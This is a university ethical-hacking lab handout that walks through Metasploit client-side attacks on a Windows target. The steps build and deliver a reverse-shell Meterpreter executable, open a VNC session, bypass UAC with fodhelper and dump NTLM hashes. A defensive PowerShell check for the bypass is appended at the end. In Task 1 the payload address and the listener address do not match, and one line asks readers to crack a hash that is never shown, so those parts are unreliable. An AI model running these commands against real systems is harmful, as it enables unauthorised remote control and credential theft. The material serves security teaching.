
Ethical Hacking Lab

Yarmouk University
Faculty of IT
Lab #8

Lab Title: System Hacking 2: Exploiting Client-Side Vulnerabilities and Establishing a VNC Session

Lab objectives:

o Exploiting client-side vulnerabilities and establishing a VNC session
o Escalating privileges by exploiting client-side vulnerabilities

Requisites:

Windows 10 / 7 machine.
Winrtgen (rainbow table generator): https://sourceforge.net/projects/rainbowtablesge/

Lab Scenario:

• Virtual Network Computing (VNC) is a graphical desktop-sharing system that uses the Remote Frame Buffer (RFB) protocol to remotely control another computer.
• VNC enables attackers to remotely access and control targeted computers from another computer or mobile device, wherever they are in the world.
• At the same time, it is also used by network administrators and organizations in every industry sector for a range of scenarios and use cases, including providing IT desktop support to colleagues and friends and accessing systems and services on the move. Here, we will see how attackers can exploit vulnerabilities in target systems to establish unauthorized VNC sessions and remotely control these targets.
Lab tasks:

Task#1
• Open a terminal window and type

msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=10.10.10.11 LPORT=444 -o /root/Desktop/Test.exe

and press Enter. LHOST and LPORT are the address and port the payload connects back to, so they must match the address and port the listener below is configured with.

• Now create a directory to share this file with the victim's machine, set its permissions, and copy the file from the Desktop to the shared location. To do that, follow these steps:

Type mkdir /var/www/html/share and press Enter to create a share folder.
Type chmod -R 755 /var/www/html/share and press Enter.
Type chown -R www-data:www-data /var/www/html/share and press Enter.
• Now move the malicious file to the shared location by typing mv /root/Desktop/Test.exe /var/www/html/share and press Enter.
• Start the Apache server by typing service apache2 start and press Enter.
• In the terminal window, type msfconsole and press Enter to start the Metasploit Framework.

Once the Metasploit Framework starts and you get an msf command line, type the following commands to set up a listener:
Type use multi/handler and press Enter.
Type set payload windows/meterpreter/reverse_tcp and press Enter.
Type set LHOST 10.10.10.10 and press Enter.
Type set LPORT 444 and press Enter.
To start the listener, type run and press Enter.

WITH TARGET WINDOWS MACHINE >>>

Open a browser (in this lab we are using the Chrome browser) and in the address bar type http://10.10.10.10/share and press Enter.
As soon as you press Enter, it displays the share folder contents as shown in the screenshot.
Click the Test.exe file to download it.
The Test.exe file is saved on the Desktop of the Windows 10 machine; double-click the executable to run it.

With Kali host: observe that one session is created or opened in the Meterpreter shell.

In the meterpreter command line, type sysinfo and press Enter to get the system information of the victim machine.

Type run vnc and press Enter to start a VNC session with the victim.
A TightVNC window appears showing the victim's Desktop.

Task#2
• Once attackers gain access to the target system, they start looking for different ways to escalate their privileges in the system.
• They can exploit a vulnerability, design flaw or configuration oversight in the operating system or in software applications on the target system to gain elevated access to resources that are normally protected from an application or user.
• Privilege escalation can be vertical or lateral.
This task demonstrates the exploitation procedure on a weakly patched Windows machine: first gaining access to it through a meterpreter shell, and then employing privilege escalation techniques to attain administrative privileges on the machine through that meterpreter shell.

• Open a terminal window and type:

msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=10.10.10.11 -f exe > Desktop/Exploit.exe

and press Enter. Run it from /root so that the relative path Desktop/Exploit.exe resolves to /root/Desktop/Exploit.exe, the path used in the copy step below.
The command creates an Exploit.exe file on the Kali machine's Desktop.

• Type the following commands to create a share folder and set its permissions:

Type the command mkdir /var/www/html/share and press Enter.
Type the command chmod -R 755 /var/www/html/share/ and press Enter.
Type the command chown -R www-data:www-data /var/www/html/share/ and press Enter.
Type the command ls -la /var/www/html/ | grep share and press Enter to verify that the folder exists with the expected permissions and owner.

Next, to start the Apache server, type the command service apache2 start in the terminal and press Enter.
Type the command cp /root/Desktop/Exploit.exe /var/www/html/share/ in the terminal and press Enter.
In the terminal window, type msfconsole and press Enter to start the Metasploit Framework.
Type use exploit/multi/handler and press Enter.
Type set payload windows/meterpreter/reverse_tcp and press Enter.
Type set LHOST 10.10.10.11 and press Enter.
To start the listener, type exploit -j -z and press Enter (-j runs the handler as a background job; -z keeps it from interacting with a new session automatically).

• Now start your Windows machine (target).
• Open a browser (in this lab we are using the Chrome browser) and in the address bar type http://10.10.10.11/share and press Enter.
• As soon as you press Enter, it displays the share folder contents as shown in the screenshot. Click the Exploit.exe file to download it.
• Run Exploit.exe.
• Back in the Linux terminal (Metasploit session), observe that one session is created or opened in the Meterpreter shell.

Type sessions -i 1 and press Enter to start interacting with the victim machine.

• To get the server username, type getuid in the meterpreter command line and press Enter.

• Type run post/windows/gather/smart_hashdump and press Enter. The command fails to dump the password hashes because of insufficient privileges.

Now, we shall try to escalate privileges by bypassing the User Account Control (UAC) setting that is blocking you from gaining unrestricted access to the machine.
You will first issue a getsystem command, which attempts to elevate the user privileges.
The command issued is getsystem -t 1, which uses the Service - Named Pipe Impersonation (In Memory/Admin) technique.
This command also fails to escalate the privileges, as shown in the screenshot: the session's token is still restricted by UAC.

Type background and press Enter to background the meterpreter session.

Type use exploit/windows/local/bypassuac_fodhelper and press Enter. Then type show options and press Enter to show the customizable options for the module.

Type set SESSION 1 (1 is the current meterpreter session, which was backgrounded in this lab) and press Enter.
Now that we have configured the exploit, our next step is to set a payload and configure it.
Type set payload windows/meterpreter/reverse_tcp and press Enter to set the meterpreter/reverse_tcp payload.
The next step is to configure this payload. To see all the options you need to configure in the exploit, type show options and press Enter.

To set the LHOST option, type set LHOST 10.10.10.11 and press Enter.
To set the TARGET option, type set TARGET 0 and press Enter. Then type exploit and press Enter.

• Check the current user ID status of meterpreter by issuing the getuid command.

• Type getsystem and press Enter. Type getuid and press Enter. The meterpreter session is now running with SYSTEM privileges (NT AUTHORITY\SYSTEM).
Now try to dump the password hashes again by typing the command run post/windows/gather/smart_hashdump and press Enter. This time, meterpreter successfully extracts the NTLM hashes and displays them in the terminal window.

Here is a password hash. Can you recover the plaintext?
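The UAC bypass used in Task 2 only works when the target lets an auto-elevating binary (fodhelper.exe) run for an administrator in Admin Approval Mode without a prompt. The following PowerShell script is added here as a defender's check and is not part of the lab: it reports the host's UAC prompt level, whether the current user holds an elevated administrator token, and whether the ms-settings handler override key under HKCU that the fodhelper technique is documented to write is present. It assumes the standard UAC policy location under HKLM and reads only; the one remediation line is left commented out.

```powershell
# Added defender-side check, not part of the lab: run on the Windows target
# (or any Windows 10 host) to see whether its UAC configuration leaves room
# for a fodhelper-style auto-elevation bypass and whether the HKCU handler
# key that technique writes is currently present.

$policyKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
$uac = Get-ItemProperty -Path $policyKey

# Meaning of ConsentPromptBehaviorAdmin (documented UAC policy values).
$levels = @{
    0 = 'Elevate without prompting'
    1 = 'Prompt for credentials on the secure desktop'
    2 = 'Always notify: prompt for consent on the secure desktop'
    3 = 'Prompt for credentials'
    4 = 'Prompt for consent'
    5 = 'Prompt for consent for non-Windows binaries (default)'
}
$behavior = [int]$uac.ConsentPromptBehaviorAdmin
Write-Output ("EnableLUA                  = {0}" -f $uac.EnableLUA)
Write-Output ("ConsentPromptBehaviorAdmin = {0} ({1})" -f $behavior, $levels[$behavior])

if ($uac.EnableLUA -eq 0) {
    Write-Warning 'UAC is disabled: every administrator process already runs elevated.'
} elseif ($behavior -ne 2) {
    Write-Warning 'UAC is below "Always notify": auto-elevating binaries such as fodhelper.exe run without a prompt, which bypassuac_fodhelper relies on.'
} else {
    Write-Output 'UAC is at "Always notify": fodhelper.exe would prompt, so this bypass does not apply.'
}

# Is the current process running with an elevated administrator token?
# (For an admin in Admin Approval Mode the filtered token reports $false.)
$id = [Security.Principal.WindowsIdentity]::GetCurrent()
$isAdmin = ([Security.Principal.WindowsPrincipal]$id).IsInRole(
    [Security.Principal.WindowsBuiltInRole]::Administrator)
Write-Output ("Current user {0} has an elevated administrator token: {1}" -f $id.Name, $isAdmin)

# The fodhelper technique registers a fake ms-settings protocol handler in the
# current user's hive; this key does not exist on a clean system.
$hijackKey = 'HKCU:\Software\Classes\ms-settings\Shell\Open\command'
if (Test-Path $hijackKey) {
    $handler = Get-ItemProperty -Path $hijackKey
    Write-Warning "Suspicious key present: $hijackKey"
    Write-Warning ("  (default)       = {0}" -f $handler.'(default)')
    Write-Warning ("  DelegateExecute = {0}" -f $handler.DelegateExecute)
    # Removing the key neutralises a planted handler; capture it as evidence first.
    # Remove-Item -Path 'HKCU:\Software\Classes\ms-settings' -Recurse -Force
} else {
    Write-Output "No ms-settings handler override under HKCU (key $hijackKey absent)."
}
```

Raising UAC to "Always notify" and alerting on creation of the HKCU ms-settings command key are the two controls that directly address the step the lab exercises.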
